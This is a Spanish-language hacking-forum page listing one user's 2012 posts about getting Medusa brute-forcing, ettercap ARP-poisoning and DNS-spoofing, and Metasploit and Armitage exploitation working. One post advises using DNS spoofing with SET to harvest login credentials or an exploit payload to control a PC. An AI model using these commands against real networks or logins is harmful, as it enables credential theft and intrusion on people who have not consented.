Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - transfersote

#11
He tratado de hace un ataque de fureza bruta a un login y pass con esta herramenta, pero al usarla me dice q es exitoso cuando en verdad no fue X(
estos son los comandos que use:

los datos de usuario y contraseña  no son correctos pero marca que si lo son
Citarmedusa -h ip -u 1114 -p 562 -M web-form -m FORM:"/sistemas/acceso.php"  

esta es la salida
Citar
ACCOUNT FOUND: [web-form] HOST: ip user: 1114 pasword: 562 [SUCCESS]

:-(
#12
bueno al final lo que funciono fue borrar todo rastro de metsploit y reinstalar la nueva versión que ya funciono al 100%  ;-) ;-)
#13
-> modificaste el archivo
Citaretter.conf
para iptables??

->modificaste el
Citarip_forward
para el redireccionammiento??

:silbar: :silbar:
#14
prueba utlizando este comando antes de usar el ettercap

Citarecho 1 > /proc/sys/net/ipv4//ip_forward
:P

y para probar q si funciono usa

Citarcat  /proc/sys/net/ipv4//ip_forward
y te debe de aparecer un 1
#15
:( :(Tengo problemas con metasploit al hacer msfupdate y otras operaciones me marca error con unas librerias, encontre q se soculicona cambiando el path del alias que trae por defecto

  • path con el error: :¬¬
    Citar/opt/metasploit/apps/pro/msf3/
  • path correcto
    Citar/opt/metasploit/msf3
::)

pero no se en que carpeta se guarde esepro me puedan decir eh provado con algunas  que eh leio que seguin ahi se guarda pero no :xD
#16
los pasos que realizo son los siguientes
1.-escaneo rapido condeteccion OS
2.- escaneo para puertos
3.- busco los ataques
4.- escojo uno ("no uso haily mery por q ese rara vs funciona")
5.-ya que la pc esta infectada le doy en la opcion meterpreter y aparecen:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> [ * ] Command shell session 12 closed.  Reason: Died from EOFError

y eso pasa siempre al usar la opcion meterpreter
desconsco si el error sea solo del armitage o del metasploit

#17
Hacking / SULUCIONADO
4 Abril 2012, 08:58 AM
La solucion consistio en reinstalar todo ettercap desde los repositorios y configurar de nuevo los archivos y el set q tambien estaba utilizando
#18
Hacking / Re: ettercap backtrack 5
1 Abril 2012, 09:07 AM
me falto decir que ya tambien eh modificado el
Citaretter.conf
y
Citaretter.dns
#19
Hacking / Re: Backtrack 5 PC Vulnerable?
1 Abril 2012, 09:05 AM
podiras hacer un dns spoofing convinado con set para sacar las credenciales("usuarios y contraseñas") de las paginas o poner un exploit con un payload para tener control sobre ella.
si usas armitage usando la obcion haily mary de la pestaña de ataques no siempre resulta satisfacorio por q los puertos q trae por default son muy altos raraves le atina  ;D
mejor usa uno por uno cambiando los puertos que tiene definidos por uno q este abierto.
#20
Hacking / ettercap backtrack 5
1 Abril 2012, 09:00 AM
comando usado

Citarettercap -Tq -i wlan0 -P dns_spoof -M arp // //

y obtengo esto

Citarettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 70)
Listening on wlan0... (Ethernet)

wlan0 ->       xx:xx:xx:xx:xx      192.168.1.69     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [xx:xx:xx:xx:xx] REQUEST 192.168.1.69
DHCP: [192.168.1.254] ACK : 192.168.1.69 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "lan"
DHCP: [xx:xx:xx:xx:xx] REQUEST 192.168.1.69
pero no realiza el dns_spoof segun encontre en la web que se debe a el error que esta en rojo
como se puede solucionar este error  :)